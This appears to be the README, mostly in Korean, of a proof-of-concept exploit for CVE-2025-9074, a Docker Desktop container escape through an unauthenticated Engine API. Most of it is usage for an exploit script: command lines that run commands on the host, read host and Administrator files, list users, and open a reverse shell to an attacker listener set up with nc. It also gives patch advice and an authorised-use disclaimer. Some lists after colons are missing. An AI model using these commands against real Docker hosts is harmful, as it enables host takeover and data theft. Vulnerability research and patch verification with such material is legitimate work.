
CVE-2025-9074에 대한 개념 증명 익스플로잇 - Windows 및 macOS에서 Docker Desktop < 4.44.3에 영향을 미치는 인증되지 않은 Docker Engine API 컨테이너 탈출 (CVSS 9.3)
CVE-2025-9074에 대한 개념 증명 익스플로잇 - Docker Desktop에서 인증 없이 Docker Engine API에 접근할 수 있는 중요한 컨테이너 탈출 취약점입니다.
| 속성 | 값 |
|---|---|
| CVE ID | CVE-2025-9074 |
| CVSS 점수 | 9.3 (심각) |
| 영향받는 소프트웨어 | Docker Desktop < 4.44.3 |
| 영향받는 플랫폼 | Windows, macOS (Linux 영향 없음) |
| 수정 버전 | Docker Desktop 4.44.3+ |
| 발견자 | Felix Boulet, Philippe Dugré |
| 발견 날짜 | 2025년 중반 |
| 패치 날짜 | 2025년 8월 20일 |
이 취약점으로 인해 Docker Desktop에서 실행 중인 컨테이너가 http://192.168.65.7:2375에서 Docker Engine API에 인증 없이 접근할 수 있습니다. 이는 다음 설정과 관계없이 발생합니다:
Docker Engine API가 컨테이너 내부에서 접근 가능한 TCP 소켓에 노출되어 다음이 가능했습니다:
pip3 install requests
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# Once connected, host filesystem is at: /hostfs
# If you already have access to a container
curl http://192.168.65.7:2375/version
graph TD
A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|Create Container| C[Privileged Container]
C -->|Mount Host FS| D[Full Host Access]
D -->|Read/Write| E[Compromise System]
즉시 Docker Desktop 4.44.3 이상으로 업데이트하십시오.
# Check your Docker Desktop version
docker --version
# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
즉시 업데이트가 불가능한 경우:
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하십시오.